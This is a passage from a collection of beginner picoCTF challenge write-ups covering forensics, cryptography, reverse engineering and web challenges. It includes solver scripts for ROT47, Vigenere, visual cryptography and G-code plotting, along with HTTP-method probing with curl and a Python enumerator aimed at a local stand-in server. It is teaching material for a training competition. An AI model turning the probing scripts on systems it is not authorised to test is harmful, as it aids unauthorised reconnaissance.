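def combine_xor(share1: Bitmap, share2: Bitmap) -> Bitmap:
    """XOR stacking: the exact inverse of make_shares."""
    return [[a ^ b for a, b in zip(r1, r2)] for r1, r2 in zip(share1, share2)]


def render(bitmap: Bitmap) -> str:
    """ASCII view of a bitmap: '#' for dark, '.' for light."""
    return "\n".join("".join("#" if px else "." for px in row) for row in bitmap)


if __name__ == "__main__":
    s1, s2 = make_shares(SECRET, seed=7)
    print("share 1 (noise):\n" + render(s1))
    print("share 2 (noise):\n" + render(s2))
    print("XOR of both shares:\n" + render(combine_xor(s1, s2)))
```

XOR is the exact inverse of how the shares are built here; the write-up's numpy script adds the arrays instead, which on `uint8` images wraps around modulo 256, and StegSolve offers both so you can try each combiner against images whose construction you do not know.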

## References

- [Wikipedia - Visual cryptography](https://en.wikipedia.org/wiki/Visual_cryptography)
-------------------------------------------------------------------------------- /picoCTF_2021/Cryptography/README.md: --------------------------------------------------------------------------------
# Cryptography Challenges

9 Challenges:
- [Dachshund Attacks](Dachshund_Attacks.md)
- [Easy Peasy](Easy_Peasy.md)
- [Mind your Ps and Qs](Mind_your_Ps_and_Qs.md)
- [Mini RSA](Mini_RSA.md)
- [Mod 26](Mod_26.md)
- [New Caesar](New_Caesar.md)
- [No Padding, No Problem](No_Padding_No_Problem.md)
- [Pixelated](Pixelated.md)
- [Play Nice](Play_Nice.md)
-------------------------------------------------------------------------------- /picoCTF_2021/Forensics/Booting_disk_in_Qemu.png: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2021/Forensics/Booting_disk_in_Qemu.png
-------------------------------------------------------------------------------- /picoCTF_2021/Forensics/Disk_disk_sleuth.md: --------------------------------------------------------------------------------
# Disk, disk, sleuth!

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 110
Tags: picoCTF 2021, Forensics
Author: SYREAL

Description:
Use `srch_strings` from the sleuthkit and some terminal-fu to find a flag in this disk image:
dds1-alpine.flag.img.gz

Hints:
1. Have you ever used `file` to determine what a file was?
2. Relevant terminal-fu in picoGym: https://play.picoctf.org/practice/challenge/85
3. Mastering this terminal-fu would enable you to find the flag in a single command:
https://play.picoctf.org/practice/challenge/48
4. Using your own computer, you could use qemu to boot from this disk!
```
Challenge link: [https://play.picoctf.org/practice/challenge/113](https://play.picoctf.org/practice/challenge/113)

## Solution

Let's start with unpacking the given file
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Forensics/Disk_disk_sleuth]
└─$ gunzip dds1-alpine.flag.img.gz
gzip: dds1-alpine.flag.img: Value too large for defined data type

┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Forensics/Disk_disk_sleuth]
└─$ file dds1-alpine.flag.img
dds1-alpine.flag.img: DOS/MBR boot sector; partition 1 : ID=0x83, active, start-CHS (0x0,32,33), end-CHS (0x10,81,1), startsector 2048, 260096 sectors
```

So we have a disk image with an MBR boot sector and one partition.

Let's search for strings in the image with either `srch_strings` or `strings`
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Forensics/Disk_disk_sleuth]
└─$ strings -n 8 dds1-alpine.flag.img | grep -oE 'picoCTF{.*}'
picoCTF{}

┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Forensics/Disk_disk_sleuth]
└─$ srch_strings dds1-alpine.flag.img | grep -oE 'picoCTF{.*}'
picoCTF{}
```

Both seem to work equally well and find the flag.

For additional information, please see the references below.
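Both this challenge and "strings it" above rest on the same two tools: `strings -n N` scans a file for runs of at least N printable bytes, and `grep -oE` picks the flag pattern out of those runs. As an added example (not from either write-up), here is a minimal re-implementation of that pipeline so it is clear what the tools actually do to a binary or a disk image; `SAMPLE_BLOB` is a constructed byte string, and the helper names are hypothetical.

```python
"""Added example (not from the write-ups): `strings -n N | grep -oE 'picoCTF{.*}'`
re-implemented. SAMPLE_BLOB is constructed; pass a file path to scan a real file."""
import re
import sys
from typing import Iterator, List

# Constructed sample: binary junk with a few printable runs, one holding a fake flag
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01\x00\x00\x00"      # "ELF" is only 3 bytes long: never a string
    b"short\x00"                             # 5 bytes: kept at -n 4, dropped at -n 8
    b"Hello from a fake binary\x00"
    b"\xff\xfe\x01\x02"
    b"picoCTF{constructed_sample_flag}\x00"
    b"\x00\x00\x00"
)

# What strings(1) treats as printable in its default (ASCII) mode: 0x20..0x7e plus tab
PRINTABLE = set(range(0x20, 0x7F)) | {0x09}

# Non-greedy so that two flags in one run are matched separately
FLAG_RE = re.compile(r"picoCTF\{.*?\}")


def extract_strings(data: bytes, min_len: int = 4) -> Iterator[str]:
    """Yield every run of at least `min_len` printable bytes, like `strings -n min_len`."""
    run = bytearray()
    for byte in data:
        if byte in PRINTABLE:
            run.append(byte)
            continue
        if len(run) >= min_len:
            yield run.decode("ascii")
        run.clear()
    if len(run) >= min_len:      # a run that extends to the end of the data
        yield run.decode("ascii")


def find_flags(data: bytes, min_len: int = 8) -> List[str]:
    """The `strings -n 8 file | grep -oE 'picoCTF{.*}'` pipeline as one function."""
    return [m.group(0)
            for s in extract_strings(data, min_len)
            for m in FLAG_RE.finditer(s)]


if __name__ == "__main__":
    # Reads the whole file into memory; a multi-hundred-MB disk image still fits,
    # but a streaming reader would be the next step for anything larger.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    for s in extract_strings(blob, 8):
        print(s)
    print("flags:", find_flags(blob))
```

The minimum length is why `-n 8` cuts down the noise on a 130 MB image: most random-looking four-character runs disappear while a flag, which is much longer, survives. Note that this only finds text stored as plain ASCII; a flag stored as UTF-16 (as Windows binaries often do) needs `strings -e l` or an equivalent decoder.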

## References

- [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html)
- [strings - Linux manual page](https://man7.org/linux/man-pages/man1/strings.1.html)
- [Wikipedia - String (computer science)](https://en.wikipedia.org/wiki/String_(computer_science))
-------------------------------------------------------------------------------- /picoCTF_2021/Forensics/README.md: --------------------------------------------------------------------------------
# Forensics Challenges

11 Challenges:
- [Disk, disk, sleuth!](Disk_disk_sleuth.md)
- [Disk, disk, sleuth! II](Disk_disk_sleuth_II.md)
- [information](information.md)
- [MacroHard WeakEdge](MacroHard_WeakEdge.md)
- [Matryoshka doll](Matryoshka_doll.md)
- [Milkslap](Milkslap.md)
- [Surfing the Waves](Surfing_the_Waves.md)
- [Trivial Flag Transfer Protocol](Trivial_Flag_Transfer_Protocol.md)
- [tunn3l v1s10n](tunn3l_v1s10n.md)
- [Wireshark doo dooo do doo...](Wireshark_doo_dooo_do_doo.md)
- [Wireshark twoo twooo two twoo...](Wireshark_twoo_twooo_two_twoo.md)
-------------------------------------------------------------------------------- /picoCTF_2021/General_Skills/Obedient_Cat.md: --------------------------------------------------------------------------------
# Obedient Cat

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 5
Tags: picoCTF 2021, General Skills
Author: SYREAL

Description:
This file has a flag in plain sight (aka "in-the-clear").
Download flag.

Hints:
1. Any hints about entering a command into the Terminal (such as the next one), will start with
a '$'... everything after the dollar sign will be typed (or copy and pasted) into your Terminal.
2. To get the file accessible in your shell, enter the following in the Terminal prompt:
$ wget https://mercury.picoctf.net/static/fb851c1858cc762bd4eed569013d7f00/flag
3. $ man cat
```
Challenge link: [https://play.picoctf.org/practice/challenge/147](https://play.picoctf.org/practice/challenge/147)

## Solution

picoCTF is a VERY beginner-friendly CTF and this must be one of the easiest challenges ever.

As suggested in the hints, use either `wget` or your browser (right-click and select `Save link as...`) to download
the flag file.

Then use `cat` (on Linux), `type` (on Windows) or any text editor to view the flag.

For additional information, please see the references below.

## References

- [cat - Linux manual page](https://man7.org/linux/man-pages/man1/cat.1.html)
- [wget - Linux manual page](https://man7.org/linux/man-pages/man1/wget.1.html)
- [type - Windows Command](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732507(v=ws.11))
-------------------------------------------------------------------------------- /picoCTF_2021/General_Skills/Python_Wrangling.md: --------------------------------------------------------------------------------
# Python Wrangling

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 10
Tags: picoCTF 2021, General Skills
Author: SYREAL

Description:
Python scripts are invoked kind of like programs in the Terminal...
Can you run this Python script using this password to get the flag?

Hints:
1. Get the Python script accessible in your shell by entering the following command in the Terminal prompt:
$ wget https://mercury.picoctf.net/static/1b247b1631eb377d9392bfa4871b2eb1/ende.py
2. $ man python
```
Challenge link: [https://play.picoctf.org/practice/challenge/166](https://play.picoctf.org/practice/challenge/166)

## Solution

Given in the challenge are:
* A Python script to run
* A file with a password
* A file with an encrypted flag

Check out the Python script if you like, but there is no need for that to solve the challenge.
This challenge is just an exercise in running Python scripts.

Run the Python script like this
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/General_Skills/Python_Wrangling]
└─$ python ende.py
Usage: ende.py (-e/-d) [file]
```

Ah, we need to supply the script with parameters. The `-e` probably stands for encrypt and `-d` for decrypt, and we want to decrypt.

So get the password
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/General_Skills/Python_Wrangling]
└─$ cat pw.txt
dbd1bea4dbd1bea4dbd1bea4dbd1bea4
```

And then decrypt the flag
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/General_Skills/Python_Wrangling]
└─$ python ende.py -d flag.txt.en
Please enter the password:dbd1bea4dbd1bea4dbd1bea4dbd1bea4
picoCTF{}
```

And there we have the flag.

For additional information, please see the references below.
61 | 62 | ## References 63 | 64 | - [cat - Linux manual page](https://man7.org/linux/man-pages/man1/cat.1.html) 65 | - [python - Linux manual page](https://linux.die.net/man/1/python) 66 | -------------------------------------------------------------------------------- /picoCTF_2021/General_Skills/README.md: -------------------------------------------------------------------------------- 1 | # General Skills Challenges 2 | 3 | 7 Challenges: 4 | - [Magikarp Ground Mission](Magikarp_Ground_Mission.md) 5 | - [Nice netcat...](Nice_netcat.md) 6 | - [Obedient Cat](Obedient_Cat.md) 7 | - [Python Wrangling](Python_Wrangling.md) 8 | - [Static ain't always noise](Static_aint_always_noise.md) 9 | - [Tab, Tab, Attack](Tab_Tab_Attack.md) 10 | - [Wave a flag](Wave_a_flag.md) 11 | -------------------------------------------------------------------------------- /picoCTF_2021/General_Skills/Wave_a_flag.md: -------------------------------------------------------------------------------- 1 | # Wave a flag 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 10 10 | Tags: picoCTF 2021, General Skills 11 | Author: SYREAL 12 | 13 | Description: 14 | Can you invoke help flags for a tool or binary? 15 | 16 | This program has extraordinarily helpful information... 17 | 18 | Hints: 19 | 1. This program will only work in the webshell or another Linux computer. 20 | 2. To get the file accessible in your shell, enter the following in the Terminal prompt: 21 | $ wget https://mercury.picoctf.net/static/a00f554b16385d9970dae424f66ee1ab/warm 22 | 3. Run this program by entering the following in the Terminal prompt: 23 | $ ./warm, but you'll first have to make it executable with $ chmod +x warm 24 | 4. -h and --help are the most common arguments to give to programs to get more information from them! 25 | 5. Not every program implements help features like -h and --help. 
26 | ``` 27 | Challenge link: [https://play.picoctf.org/practice/challenge/170](https://play.picoctf.org/practice/challenge/170) 28 | 29 | ## Solution 30 | 31 | Let's make sure the program is executable and run it 32 | ```bash 33 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/General_Skills/Wave_a_flag] 34 | └─$ chmod +x warm 35 | 36 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/General_Skills/Wave_a_flag] 37 | └─$ ./warm 38 | Hello user! Pass me a -h to learn what I can do! 39 | ``` 40 | 41 | Ah, as both the description and the hints suggests we should ask for help with the `-h` parameter. 42 | 43 | Ask for help 44 | ```bash 45 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/General_Skills/Wave_a_flag] 46 | └─$ ./warm -h 47 | Oh, help? I actually don't do much, but I do have this flag here: picoCTF{} 48 | ``` 49 | 50 | And there we have the flag. 51 | 52 | For additional information, please see the references below. 53 | 54 | ## References 55 | 56 | - [8 Ways To Get Help On The Linux Shell](https://vitux.com/get-help-on-linux-shell/) 57 | - [chmod - Linux manual page](https://man7.org/linux/man-pages/man1/chmod.1.html) 58 | -------------------------------------------------------------------------------- /picoCTF_2021/Reverse_Engineering/README.md: -------------------------------------------------------------------------------- 1 | # Reverse Engineering Challenges 2 | 3 | 10 Challenges: 4 | - [ARMssembly 0](ARMssembly_0.md) 5 | - [ARMssembly 1](ARMssembly_1.md) 6 | - [ARMssembly 2](ARMssembly_2.md) 7 | - [ARMssembly 3](ARMssembly_3.md) 8 | - [ARMssembly 4](ARMssembly_4.md) 9 | - [crackme-py](crackme-py.md) 10 | - [keygenme-py](keygenme-py.md) 11 | - [Shop](Shop.md) 12 | - [speeds and feeds](speeds_and_feeds.md) 13 | - [Transformation](Transformation.md) 14 | -------------------------------------------------------------------------------- /picoCTF_2021/Reverse_Engineering/The_flag_in_NC_Viewer.png: 
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2021/Reverse_Engineering/The_flag_in_NC_Viewer.png
--------------------------------------------------------------------------------
/picoCTF_2021/Reverse_Engineering/crackme-py.md:
--------------------------------------------------------------------------------
# crackme-py

- [Challenge information](#challenge-information)
- [Solutions](#solutions)
- [References](#references)

## Challenge information
```
Points: 30
Tags: picoCTF 2021, Reverse Engineering
Author: SYREAL

Description:

crackme.py

Hints:
(None)
```
Challenge link: [https://play.picoctf.org/practice/challenge/175](https://play.picoctf.org/practice/challenge/175)

## Solutions

### Analyze the Python script

Let's start by looking at the `decode_secret` function of the script
```python
def decode_secret(secret):
    """ROT47 decode

    NOTE: encode and decode are the same operation in the ROT cipher family.
    """

    # Encryption key
    rotate_const = 47

    # Storage for decoded secret
    decoded = ""

    # decode loop
    for c in secret:
        index = alphabet.find(c)
        original_index = (index + rotate_const) % len(alphabet)
        decoded = decoded + alphabet[original_index]

    print(decoded)
```

This is actually the entire code to decode the flag. The `alphabet` defined at the top of the script is the 94 printable ASCII characters from `!` to `~`, and 47 is exactly half of 94, so rotating by 47 twice gets you back where you started. That is why the docstring's note holds here: the same function both encrypts and decrypts (for a rotation that is not half the alphabet size, decryption would need the opposite shift). We can just reuse most of the script.

### Write a decoder script

Let's copy the original script, remove the `choose_greatest` function, remove some comments, add a shebang and add a call to the `decode_secret` function
```python
#!/usr/bin/python

bezos_cc_secret = "A:4@r%uL`M-^M0c0AbcM-MFE0cdhb52g2N"

# Reference alphabet
alphabet = "!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ"+ \
           "[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~"

def decode_secret(secret):
    rotate_const = 47

    decoded = ""
    for c in secret:
        index = alphabet.find(c)
        original_index = (index + rotate_const) % len(alphabet)
        decoded = decoded + alphabet[original_index]
    print(decoded)

decode_secret(bezos_cc_secret)
```

### Get the flag

Then, make sure the script is executable and run it to get the flag
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Reverse_Engineering/crackme-py]
└─$ chmod +x get_flag.py

┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Reverse_Engineering/crackme-py]
└─$ ./get_flag.py
picoCTF{}
```

## References

- [Wikipedia — ROT13](https://en.wikipedia.org/wiki/ROT13)
--------------------------------------------------------------------------------
/picoCTF_2021/Reverse_Engineering/speeds_and_feeds.md:
--------------------------------------------------------------------------------
# speeds and feeds

- [Challenge information](#challenge-information)
- [Solutions](#solutions)
- [References](#references)

## Challenge information
```
Points: 50
Tags: picoCTF 2021, Reverse Engineering
Author: RYAN RAMSEYER

Description:
There is something on my shop network running at nc mercury.picoctf.net 59953, but I can't tell what it is.
Can you?

Hints:
1. What language does a CNC machine use?
```
Challenge link: [https://play.picoctf.org/practice/challenge/116](https://play.picoctf.org/practice/challenge/116)

## Solutions

### Analyze the output

We start by connecting to the service and watching the output
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Reverse_Engineering/speeds_and_feeds]
└─$ nc mercury.picoctf.net 59953
G17 G21 G40 G90 G64 P0.003 F50
G0Z0.1
G0Z0.1
G0X0.8276Y3.8621
G1Z0.1
G1X0.8276Y-1.9310
G0Z0.1
G0X1.1034Y3.8621
G1Z0.1
G1X1.1034Y-1.9310
G0Z0.1
G0X1.1034Y3.0345
G1Z0.1
G1X1.6552Y3.5862
G1X2.2069Y3.8621
G1X2.7586Y3.8621
G1X3.5862Y3.5862
G1X4.1379Y3.0345
G1X4.4138Y2.2069
G1X4.4138Y1.6552
G1X4.1379Y0.8276
G1X3.5862Y0.2759
G1X2.7586Y0.0000
<---snip--->
```

A LOT of output in some unknown format. Let's save the output in a local file
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Reverse_Engineering/speeds_and_feeds]
└─$ nc mercury.picoctf.net 59953 > speeds_and_feeds_output.txt
```

Now it's time to research what kind of format this is...
It looks like it is something called [G-code](https://en.wikipedia.org/wiki/G-code), the language CNC machines are driven with (hint 1).

The parts that matter for us: `G90` selects absolute coordinates, `G0` is a rapid positioning move with the tool raised, and `G1` is a straight cut at the programmed feed rate (`F50`). So every `G1X…Y…` line is a pen-down stroke from the current position to the given point, and the `G0` lines are the jumps between strokes. Plotted on a 2D canvas, the strokes draw the flag.

Next, we need to find an online interpreter for it. [NC Viewer](https://ncviewer.com/) is one.

### Get the flag

In `NC Viewer`, click on the New File icon and paste in the output from the `speeds_and_feeds_output.txt` file above.
Then click the `PLOT` button.

The result should look something like this:

![Part of the flag in NC Viewer](The_flag_in_NC_Viewer.png)

Zoom out and re-position the grid and you have the whole flag.

For additional information, please see the references below.
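To check the same thing offline, here is an added example (not part of the original writeup, and not NC Viewer's code) that parses the `G0`/`G1` moves out of a G-code program and rasterises the cutting moves into ASCII art. The program embedded in it is a constructed sample that cuts a square and a short bar; run the script with the saved `speeds_and_feeds_output.txt` as its argument to render the challenge output instead.

```python
#!/usr/bin/env python3
"""Plot the G1 (cutting) moves of a G-code program as ASCII art."""
import re
import sys
from typing import List, Tuple

Point = Tuple[float, float]
Segment = Tuple[Point, Point]

# One G-code "word": an address letter followed by a (signed, possibly decimal) number
WORD_RE = re.compile(r"([A-Z])(-?\d+(?:\.\d+)?)")

# Constructed sample program (same preamble style as the challenge output):
# a 4x4 square cut with G1, a rapid G0 hop, then a short horizontal bar.
SAMPLE_GCODE = """\
G17 G21 G40 G90 G64 P0.003 F50
G0Z0.1
G0X0Y0
G1Z-0.1
G1X4Y0
G1X4Y4
G1X0Y4
G1X0Y0
G0Z0.1
G0X6Y6
G1Z-0.1
G1X8Y6
"""


def parse_gcode(text: str) -> List[Segment]:
    """Return the straight segments traced while cutting (modal mode G1).

    G0 is a rapid move with the tool raised, G1 a linear feed with the tool
    down; X/Y are absolute (G90). Every other word (G17/G21/G40/G64, Z, F, P)
    is accepted and ignored, since it does not change the 2D toolpath.
    """
    mode = None            # current motion mode: 0 = rapid, 1 = linear feed
    x, y = 0.0, 0.0        # current tool position
    segments: List[Segment] = []
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].split("(", 1)[0].strip().upper()  # drop comments
        if not line:
            continue
        nx, ny, moved = x, y, False
        for letter, value in WORD_RE.findall(line):
            if letter == "G":
                code = int(float(value))
                if code in (0, 1):       # G00/G01 also parse to 0/1
                    mode = code
            elif letter == "X":
                nx, moved = float(value), True
            elif letter == "Y":
                ny, moved = float(value), True
        if moved:
            if mode == 1:
                segments.append(((x, y), (nx, ny)))
            x, y = nx, ny
    return segments


def render(segments: List[Segment], width: int = 80, height: int = 24) -> str:
    """Rasterise the segments onto a width x height character grid."""
    if not segments:
        return ""
    xs = [p[0] for seg in segments for p in seg]
    ys = [p[1] for seg in segments for p in seg]
    min_x, min_y, max_y = min(xs), min(ys), max(ys)
    span_x = (max(xs) - min_x) or 1.0
    span_y = (max_y - min_y) or 1.0
    grid = [[" "] * width for _ in range(height)]

    def cell(p: Point) -> Tuple[int, int]:
        # Machine Y grows upwards, screen rows grow downwards: flip it.
        col = round((p[0] - min_x) / span_x * (width - 1))
        row = round((max_y - p[1]) / span_y * (height - 1))
        return row, col

    for p0, p1 in segments:
        r0, c0 = cell(p0)
        r1, c1 = cell(p1)
        steps = max(abs(r1 - r0), abs(c1 - c0), 1)
        for i in range(steps + 1):          # sample the segment cell by cell
            t = i / steps
            grid[round(r0 + (r1 - r0) * t)][round(c0 + (c1 - c0) * t)] = "#"
    return "\n".join("".join(row) for row in grid)


if __name__ == "__main__":
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GCODE
    print(render(parse_gcode(source)))
```

Only Ethernet-free, text-only G-code is involved here, so the parser is deliberately small: it tracks the modal motion mode and the current position and emits a segment for every `G1` line that changes X or Y. Arcs (`G2`/`G3`) are not interpolated, which is fine for the challenge output but would need extra code for arbitrary programs; widen the grid (`width=200`) if the letters come out cramped.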

## References

- [Wikipedia - G-code](https://en.wikipedia.org/wiki/G-code)
--------------------------------------------------------------------------------
/picoCTF_2021/Web_Exploitation/GET_aHEAD.md:
--------------------------------------------------------------------------------
# GET aHEAD

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 20
Tags: picoCTF 2021, Web Exploitation
Author: MADSTACKS

Description:
Find the flag being held on this server to get ahead of the competition
http://mercury.picoctf.net:47967/

Hints:
1. Maybe you have more than 2 choices
2. Check out tools like Burpsuite to modify your requests and look at the responses
```
Challenge link: [https://play.picoctf.org/practice/challenge/132](https://play.picoctf.org/practice/challenge/132)

## Solution

The challenge name strongly suggests that you should access the page with the `HEAD` [HTTP request method](https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods). Hint 1 says the same thing from the other side: a browser only sends GET and POST on its own, but the server may treat the other methods differently.

Let's use the `curl` tool to do that. `-I` makes curl send a real HEAD request and print only the response headers
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Web_Exploitation/GET_aHEAD]
└─$ curl -I http://mercury.picoctf.net:47967
HTTP/1.1 200 OK
flag: picoCTF{}
Content-type: text/html; charset=UTF-8
```

And as expected, there is the flag as a custom HTTP header.

Don't use `curl -X HEAD` for this: it sends a HEAD request too, but curl then still waits for a response body that never arrives and hangs until the connection times out. Use `-I` (or `--head`) instead.

For additional information, please see the references below.
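The same idea as an added example rather than the writeup's own command: a small Python script that sends every common HTTP method to a URL and reports which responses carry a header value in the flag format. Because it has to run offline, it also embeds a constructed stand-in server that, like the challenge box, only attaches its `flag` header to HEAD responses; that server and the flag value in it are made up for the example and are not the challenge's code. Point `probe_methods` at the real host and port to use it against a live target.

```python
#!/usr/bin/env python3
"""Enumerate HTTP methods and look for a flag hidden in a response header."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict, Tuple

METHODS = ("GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "PATCH", "TRACE")
FLAG_PREFIX = "picoctf{"


class LeakyHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the challenge server (not its real code):
    the secret header is only emitted for HEAD, so a browser never sees it."""

    def _respond(self, body: bytes) -> None:
        self.send_response(200)
        self.send_header("Content-type", "text/html; charset=UTF-8")
        if self.command == "HEAD":
            self.send_header("flag", "picoCTF{made_up_example_value}")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        if self.command != "HEAD":      # HEAD responses carry no body
            self.wfile.write(body)

    def do_GET(self) -> None:
        self._respond(b"<html><body>GET and POST buttons</body></html>")

    def do_POST(self) -> None:
        self._respond(b"<html><body>posted</body></html>")

    def do_HEAD(self) -> None:
        self._respond(b"")

    def log_message(self, *args) -> None:   # keep the demo output quiet
        pass


def start_server() -> HTTPServer:
    """Start the stand-in server on a random loopback port in a daemon thread."""
    server = HTTPServer(("127.0.0.1", 0), LeakyHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def probe_methods(host: str, port: int, path: str = "/",
                  methods=METHODS) -> Dict[str, Tuple[int, Dict[str, str]]]:
    """Send each method once and collect (status, headers) per method.

    A fresh connection per request keeps an unsupported method (501, or a
    server that simply closes the socket) from spoiling the following ones.
    """
    results = {}
    for method in methods:
        conn = http.client.HTTPConnection(host, port, timeout=5)
        try:
            conn.request(method, path)
            resp = conn.getresponse()
            resp.read()                    # drain the body so the socket closes cleanly
            results[method] = (resp.status, dict(resp.getheaders()))
        except OSError as exc:             # refused, reset, timeout: record and move on
            results[method] = (0, {"error": str(exc)})
        finally:
            conn.close()
    return results


def find_flag_headers(results, prefix: str = FLAG_PREFIX) -> Dict[str, Tuple[str, str]]:
    """Return {method: (header_name, header_value)} for values in flag format."""
    hits = {}
    for method, (_status, headers) in results.items():
        for name, value in headers.items():
            if value.lower().startswith(prefix):
                hits[method] = (name, value)
    return hits


if __name__ == "__main__":
    srv = start_server()
    found = probe_methods("127.0.0.1", srv.server_address[1])
    for m, (status, _) in found.items():
        print(f"{m:8} -> {status}")
    print(find_flag_headers(found))
    srv.shutdown()
```

Methods the stand-in does not implement come back as 501, which is exactly the kind of per-method difference worth noticing on a real target: anything that answers differently to OPTIONS, TRACE or PATCH than to GET deserves a closer look at its headers and body.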

## References

- [HTTP request methods](https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods)
--------------------------------------------------------------------------------
/picoCTF_2021/Web_Exploitation/README.md:
--------------------------------------------------------------------------------
# Web Exploitation Challenges

9 Challenges:
- [Cookies](Cookies.md)
- [GET aHEAD](GET_aHEAD.md)
- [It is my Birthday](It_is_my_Birthday.md)
- [More Cookies](More_Cookies.md)
- [Most Cookies](Most_Cookies.md)
- [Scavenger Hunt](Scavenger_Hunt.md)
- [Some Assembly Required 1](Some_Assembly_Required_1.md)
- [Some Assembly Required 2](Some_Assembly_Required_2.md)
- [Who are you?](Who_are_you.md)
--------------------------------------------------------------------------------
/picoCTF_2022/Binary_Exploitation/CVE-XXXX-XXXX.md:
--------------------------------------------------------------------------------
# CVE-XXXX-XXXX

- [Challenge information](#challenge-information)
- [Solution](#solution)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2022, Binary Exploitation
Author: MUBARAK MIKAIL

Description:

The CVE we're looking for is the first recorded remote code execution (RCE) vulnerability in 2021 in
the Windows Print Spooler Service, which is available across desktop and server versions of Windows
operating systems. The service is used to manage printers and print servers.

Enter the CVE of the vulnerability as the flag with the correct flag format:
picoCTF{CVE-XXXX-XXXXX} replacing XXXX-XXXXX with the numbers for the matching vulnerability.

Hints:
1. We're not looking for the Local Spooler vulnerability in 2021...
```

Challenge link: [https://play.picoctf.org/practice/challenge/262](https://play.picoctf.org/practice/challenge/262)

## Solution

Googling for `Windows Print Spooler Service RCE CVE 2021` gives you the answer among the top 10 results.

Wrap [this CVE-number](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527) as instructed to get the flag.
--------------------------------------------------------------------------------
/picoCTF_2022/Binary_Exploitation/README.md:
--------------------------------------------------------------------------------
# Binary Exploitation Challenges

## Medium Binary Exploitation Challenges

- [basic-file-exploit](basic-file-exploit.md)
- [buffer overflow 0](buffer_overflow_0.md)
- [buffer overflow 1](buffer_overflow_1.md)
- [buffer overflow 2](buffer_overflow_2.md)
- [CVE-XXXX-XXXX](CVE-XXXX-XXXX.md)
- [RPS](RPS.md)
--------------------------------------------------------------------------------
/picoCTF_2022/Cryptography/README.md:
--------------------------------------------------------------------------------
# Cryptography Challenges

## Medium Cryptography Challenges

- [basic-mod1](basic-mod1.md)
- [basic-mod2](basic-mod2.md)
- [credstuff](credstuff.md)
- [morse-code](morse-code.md)
- [rail-fence](rail-fence.md)
- [substitution0](substitution0.md)
- [substitution1](substitution1.md)
- [substitution2](substitution2.md)
- [transposition-trial](transposition-trial.md)
- [Vigenere](Vigenere.md)
--------------------------------------------------------------------------------
/picoCTF_2022/Cryptography/Vigenere.md:
--------------------------------------------------------------------------------
# Vigenere

- [Challenge information](#challenge-information)
- [Online solver solution](#online-solver-solution)
- [Python solution](#python-solution)
- [References](#references)

## Challenge information

```text
Level: Medium
Tags: picoCTF 2022, Cryptography
Author: MUBARAK MIKAIL

Description:
Can you decrypt this message?

Decrypt this message using this key "CYLAB".

Hints:
1. https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher
```

Challenge link: [https://play.picoctf.org/practice/challenge/316](https://play.picoctf.org/practice/challenge/316)

The message given looks like this

```text
rgnoDVD{O0NU_WQ3_G1G3O3T3_A1AH3S_f85729e7}
```

There probably are more ways to solve this challenge, but here are two solutions.

## Online solver solution

You can use an online solver such as [Rumkin](https://rumkin.com/tools/cipher/vigenere/) to solve this challenge.

Set the 'Operating Mode' to `Decrypt` and set the 'Cipher key' to `CYLAB`.
Then enter the cipher text in the large text field and you get the flag at the bottom of the window.

## Python solution

In addition, let's write a small Python script called `solve.py` to decode this. The one detail to get right is key alignment: only letters consume a key character, so the digits, braces and underscores in the flag are copied through without advancing the key.

```python
#!/usr/bin/python
# -*- coding: latin-1 -*-

import string

cipher_text = "rgnoDVD{O0NU_WQ3_G1G3O3T3_A1AH3S_f85729e7}"
key = 'CYLAB'

universe = string.ascii_uppercase
uni_len = len(universe)

flag = ''
k_len = len(key)

# i counts letters only; non-letters are copied through without
# consuming a key character
i = 0
for c in cipher_text:
    if c.islower():
